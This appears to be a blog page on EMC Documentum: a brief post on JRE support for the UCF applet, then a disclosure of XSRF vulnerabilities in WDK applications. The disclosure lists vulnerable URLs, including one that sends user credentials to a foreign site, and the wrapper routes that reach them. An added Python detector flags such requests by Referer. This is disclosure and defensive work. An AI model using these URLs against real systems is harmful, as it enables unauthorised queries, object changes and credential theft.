Dumb UCF applet

It seems that EMC has changed its release policy: we now got support for JRE 1.7.0_55 in webtop within two weeks of the general availability of JRE 1.7.0_55. Or maybe it is just happenstance; judge for yourselves which is more probable. Below I provide the release dates of the JRE and the corresponding webtop versions (it is worth noting that both webtop 6.7SP2P05 and 6.7SP2P07 did not fully support the corresponding JRE versions – JRE security settings had to be relaxed to get UCF working):

Documentum security vulnerabilities: multiple XSRFs in WDK applications

The cross-site request forgery attack is described in full on Wikipedia. Below is a list of URLs (or components) in WDK applications (such as Webtop, TaskSpace, EPFM, Documentum Administrator) that are vulnerable to XSRF:

DQL execution

  • /webtop/component/dqleditor?query=<query>
  • /webtop/component/appintxdql?query=<query>
  • /webtop/component/search?queryType=dql&query=<query>
  • /da/component/auditlist?query=<query>
  • /webtop/component/historicalactivityreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/processdetailreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/historicalprocessreportresults?query=<query>
  • /webtop/component/historicaluserreportresults?query=<query>
  • /webtop/action/view?objectId=<objectId of dm_query object> (executes /webtop/component/search?queryType=dql&query=<query>)
  • /webtop/action/search?queryType=dql&query=<query> (executes /webtop/component/search?queryType=dql&query=<query>)

Other

  • /webtop/component/virtuallinkconnect?redirectUrl=http://url&virtualLinkPath=/webtop/component/main (sends user credentials to foreign site, found in 6.7SP2)
  • /da/component/scsaveas?objectId=<objectId> (creates copy of objects, potentially can be used to apply less restrictive ACL to copy)
  • /webtop/action/deletenotification?type=dm_notification&routerId=0000000000000000&objectId=<objectId> (deletes dmi_queue_item object)
  • /webtop/action/demote?objectId=<objectId> (demotes document)
  • /webtop/action/promote?objectId=<objectId> (promotes document)

Components can be launched either directly (as in the examples above) or through a container:

  • /webtop/component/dialogcontainer?component=search&queryType=dql&query=<query>&componentArgs=

or through the appintgcontrollerlogin component:

  • /webtop/component/appintgcontrollerlogin?dispatchitem=search&dispatchtype=component&queryType=dql&query=<query>

Actions can be launched through ActionDispatcherServlet (as in the examples above) or through the actiondispatcher component:

  • /webtop/component/actiondispatcher?action=search&queryType=dql&query=<query>

or through any component:

  • /webtop/component/main?startupAction=search&queryType=dql&query=<query>
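
Because the same component or action can be reached through several wrappers, a log review or filter rule that matches only the direct path misses the indirect routes. The following is an added example, not part of the original post: it resolves a WDK request URL to the components and actions it would launch and flags the ones listed above when the Referer is not a trusted host. The host names, the sample entries and the choice to treat a missing Referer as untrusted are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Components and actions named in the list above. "view" only matters for
# dm_query objects, which a URL alone cannot distinguish, so expect noise.
SENSITIVE = {"dqleditor", "appintxdql", "search", "auditlist",
             "historicalactivityreportresults", "processdetailreportresults",
             "historicalprocessreportresults", "historicaluserreportresults",
             "virtuallinkconnect", "scsaveas", "view", "deletenotification",
             "demote", "promote"}
# Wrapper component -> query parameter naming the real target.
WRAPPERS = {"dialogcontainer": "component",
            "appintgcontrollerlogin": "dispatchitem",
            "actiondispatcher": "action"}

def effective_targets(url):
    """Return every component/action name a WDK URL would launch."""
    parts = urlsplit(url)
    seg = [s for s in parts.path.split("/") if s]
    qs = parse_qs(parts.query)
    targets = set()
    if len(seg) >= 3 and seg[1] in ("component", "action"):
        targets.add(seg[2])
        if seg[1] == "component":
            # Indirect launch through a wrapper component.
            targets.update(qs.get(WRAPPERS.get(seg[2], ""), []))
            # startupAction is accepted by any component.
            targets.update(qs.get("startupAction", []))
    return targets

def is_suspect(url, referer, trusted_hosts):
    """Sensitive targets hit by a request whose Referer is absent or foreign."""
    hits = effective_targets(url) & SENSITIVE
    ref_host = urlsplit(referer).hostname if referer else None
    return sorted(hits) if hits and ref_host not in trusted_hosts else []

# Constructed sample entries (request URL, Referer); hosts are placeholders.
SAMPLE = [
    ("/webtop/component/dqleditor?query=q", "https://dctm.example/webtop/"),
    ("/webtop/component/main?startupAction=search&queryType=dql&query=q",
     "http://other.example/a.html"),
    ("/webtop/component/actiondispatcher?action=promote&objectId=0", None),
    ("/webtop/component/main", "http://other.example/a.html"),
]

def scan(entries, trusted_hosts):
    return [(u, h) for u, r in entries if (h := is_suspect(u, r, trusted_hosts))]

if __name__ == "__main__":
    for url, hits in scan(SAMPLE, {"dctm.example"}):
        print(hits, url)
```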